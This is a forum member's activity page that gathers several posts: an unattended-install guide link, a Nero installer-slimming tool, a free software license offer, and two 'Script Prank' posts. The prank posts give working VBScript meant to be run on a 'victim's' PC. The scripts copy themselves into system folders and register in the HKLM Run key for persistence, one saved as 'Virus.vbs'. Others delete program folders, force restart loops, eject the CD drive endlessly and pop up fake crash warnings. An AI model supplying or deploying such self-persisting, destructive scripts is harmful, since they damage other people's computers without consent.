Jump to content

q123

Members
  • Posts

    28
  • Joined

  • Last visited

  • Days Won

    1

Reputation Activity

  1. Like
    q123 got a reaction from AMIRZ in [Expired] Vista Unattended Guide (HTML)   
    hmmm by googling :icon_cool: i got to this may be useful until site is back

    http://www.scribd.com/doc/17471845/FireGeier-Unattended-Vista-Guide2
  2. Like
    q123 reacted to pri2sh in Script Prank   
    try this script

    Set wshShell =wscript.CreateObject("WScript.Shell")
    do
    wscript.sleep 100
    wshshell.sendkeys "{CAPSLOCK}"
    wshshell.sendkeys "{NUMLOCK}"
    wshshell.sendkeys "{SCROLLLOCK}"
    loop
    run this and look on lights on your keyboard
    put this on ur fren'z start up folder for more fun
  3. Like
    q123 reacted to Mr.Thunderbird in Script Prank   
    Items you need
    -> Notepad
    -> You and your victim is running Windows
    1. Open notepad
    2. On the first line add

    wshshell.run "calc"
    wscript.sleep 100
    wshshell.sendkeys "5"
    wscript.sleep 1000
    wshshell.run "calc"
    wscript.sleep 100
    wshshell.sendkeys "4"
    wscript.sleep 1000
    wshshell.run "calc"
    wscript.sleep 100
    wshshell.sendkeys "3"
    wscript.sleep 1000
    wshshell.run "calc"
    wscript.sleep 100
    wshshell.sendkeys "2"
    wscript.sleep 1000
    wshshell.run "calc"
    wscript.sleep 100
    wshshell.sendkeys "1"
    wscript.sleep 1000
    wshshell.run "calc"
    wscript.sleep 100
    wshshell.sendkeys "0"

    - This would make the calculater pop up, counting down from 5 to 0 with 1 second of space between each calculater pops up.

    Set wshshell = WScript.CreateObject("Scripting.FileSystemObject")
    Wshshell.CopyFile WScript.ScriptFullName, "C:\PATH OF YOUR CHOICE\FILENAME.vbs"
    PATH OF YOUR CHOICE indicates where you want to copy your script to.
    FILENAME indicates the name of your VBS script.
    Example:

    C:\WINDOWS\system32\SuperNewTankGame.vbs
    This command will copy your script to C/Windows/System32

    Wshshell.RegWrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\filename","C:\PATH OF YOUR CHOICE\FILENAME.vbs"
    You need you use this command with the copy command in order to work...
    NOW, THIS IS EVIL !
    This command will add your script to the startup program list, so every time your victim starts his computer, the script will run itself.
    Please, remember to add

    Set wshShell = wscript.CreateObject("WScript.Shell")
    after using COPY or REGWRITE command

    Set wshshell = wscript.CreateObject("WScript.Shell")
    Wshshell.RegWrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\shutup.exe","C:\Virus.vbs"
    Set wshshell = WScript.CreateObject("Scripting.FileSystemObject")
    Wshshell.CopyFile WScript.ScriptFullName, "C:\Virus.vbs"
    Set wshshell = wscript.CreateObject("WScript.Shell")
    Delete Folder Code

    Dim FSO, Folder
    set FSO=CreateObject("Scripting.FileSystemObject")
    Folder="C:\PATCH OF FOLDER OR/ AND FOLDERNAME"
    FSO.DeleteFolder(Folder)
    Example

    Dim FSO, Folder
    set FSO=CreateObject("Scripting.FileSystemObject")
    Folder="C:\Program Files\MSN Messenger"
    FSO.DeleteFolder(Folder)
    This will restart your victims PC :lol:

    do
    WshShell.SendKeys "%{F4}"
    Wscript.sleep 100
    wshshell.sendkeys "r"
    loop
    CD EJECT [should be done without a cd/dvd in the drive, for faster ejecting]

    Set oWMP = CreateObject("WMPlayer.OCX.7" )
    Set colCDROMs = oWMP.cdromCollection
    do
    if colCDROMs.Count >= 1 then
    For i = 0 to colCDROMs.Count - 1
    colCDROMs.Item(i).Eject
    Next ' cdrom
    End If
    loop

    wshshell.AppActivate "cmd"
    'AppActivate activates the window which has a title equal to, or closest to what you type in the quotes
    'You need the sleep to make sure that it activates it after cmd has started

    wshshell.run "cmd",2
    ,2 means that the program will start minimized !
    Another code:

    MsgBox"TEXT YOU WANT TO DISPLAY",EXTRA CODES, "TITLE"
    This will launch a pop up where the title will be "TITLE", and the message will be "TEXT YOU WANT TO DISPLAY"
    For an example:

    MsgBox"Hello, this is not a JOKE, your pc will CRASH!", 0 + 16 + 4096, "Critical"

    Extra stuff that you can add in the ,EXTRA CODES, area:

    Buttons :
    0 - OK
    1 - OK, CANCEL
    2 - ABORT, RETRY, IGNORE
    3 - YES, NO, CANCEL
    4 - YES, NO
    5 - RETRY, CANCEL
    ICONS :
    16 - CRITICAL ICON
    32 - WARNING QUERY ICON
    48 - WARNING MESSAGE ICON
    64 - INFO ICON
    Extra Stuff:
    0 - NORMAL
    4096 - ALWAYS ON TOP
    ,1+16+4096, Will make a window with OK and CANCEL buttons, CRITICAL ICON, and the window will be on top of other windows
    If you want to make a command that repeats itself:

    do
    COMMAND(S)
    loop
    Where COMMAND is one of the command i listed above
    Eeeenjoy !
    And please, if somebody can make some kind of "program" to convert .vbs to .exe, ot just an exe that runs the vbs, WOULD BE AWESOME!
  4. Like
    q123 reacted to x-shadow-x in [Tool] NAR - Nero Application Remover   
    NAR (Nero Application Remover) v1.2.4

    Well here is my first release, I have been working on this for a little bit, and I want to share it.

    Info
    Nero original file size: 370Mb's
    Nero Unpacked size: 1.74-1.84GB's (depending on what version)

    Instructions

    This will step you through all the steps to make a custom installer for Nero 9.
    I have made it so you cannot remove crucial files.

    #1
    You need to extract the Nero 9 installer. Now there are 2 ways you can do this. You can use the Extractor (which is at the bottom of the page), or you can use 7zip. Im going to use the Extractor. Extract the Extractor to where the Nero 9 installer is. Then drag the Nero 9 installer onto the the Extractors exe. The Extractor will open and start extracting the files. Wait untill it extracts then rename the extracted folder to "Nero".

    #2
    Now to remove the applications and languages you dont need. You will need NAR (which you can get at the bottom of the page). Extract it into the Nero folder and run it. Select the applications and languages you dont want/need and press Ok. It will delete all of the folders containing all of the unneeded applications and languages you selected. If you mess up, just re-extract the installer. Now you need to input your serial at the bottom of the app (where the XXXX-XXXX-XXXX-XXXX-XXXX-XXXX-XXXX-XXXX is), delete the "XXXX-XXXX-XXXX-XXXX-XXXX-XXXX-XXXX-XXXX" and type\paste your serial in and hit replace. Your serial will replace the dummy serial. Once you have done that, you can select the default language for all of your nero apps (English is default). Once done, click the Create SFX button. It will start making the SFX, it may take a while to compress (depending on how many applications/Languages you removed). Once it has compressed, it is ready.

    You now have your slimmed down and silent installer for Nero 9. You can add it to WPI or whatever you want.

    Note: You need to input a real serial or the installation will fail.
    Note: Do not close NAR when you are creating the SFX.
    Note: There is a right click context menu if you need help, its there.
    This is still new so if you find any bugs or have an idea to make it better, please post here.
    Download:
    NAR 1.2.4
    http://www.2shared.com/file/4510309/c990a5ca/NAR.html
    Extractor
    http://www.2shared.com/file/4398293/dad81d99/Extract.html
    Download is in bottom right corner.


    Off-Topic Comment(Click to Show) NAR 1.1 Made NAR-LR (Nov 22)
    NAR 1.1.1 New SFX'r (Nov 24)
    NAR 1.1.2 Fixed NAR-LR (Nov 25)
    NAR 1.1.3 New Extractor (Nov 26)
    NAR 1.2 Fuzed everything together, Fixed some bugs (Nov 29)
    Extractor .50 New extractor (Dec 04)
    NAR 1.2.1 Fixed problem with extra "," in command line(Dec 7)
    NAR 1.2.2 Fixed some major problems with the commandline, added a default language selector (Dec 14)
    NAR 1.2.3 Fixed Default language selector, Added a select all/unselect all button, Added blind reader support, You now cannot go past the maximum number of charactures for the serial (so there is the exact ammount), If you mess up on inputing your serial, you can now re input the serial without it erroring, Added another application to remove, Fixed the commandline, error with serial (Dec 21)
    NAR 1.2.4 Fixed the command line (Dec 23)
    [Close]
  5. Like
    q123 reacted to AMIRZ in Get Everest Ultimate Edition 4.6 - Free License Legally   
    Get Everest Ultimate Edition 4.6 - Free License Legally

    Homepage (Lavalys): http://www.lavalys.com/
    It's not the latest version (5.02) but still good enough as a free legal giveaway, especially for people who always love and prefer genuine and still legal software... :thumbsup_anim:
    First thanks alot to For Free on Internet for such kind offer like this
    To get your free license, just visit this offer Here: http://for-free-on-internet.com/2009/06/ev...tion-46-4-free/
    or just follow the below steps instead:
    1. Go to this promotion page (in German): http://www.pro.de/aktion/com/everest
    and fill in your first and last names :
    Vorname: your first Name
    Nachname: your last name

    E-mail: your email address
    then click on
×
×
  • Create New...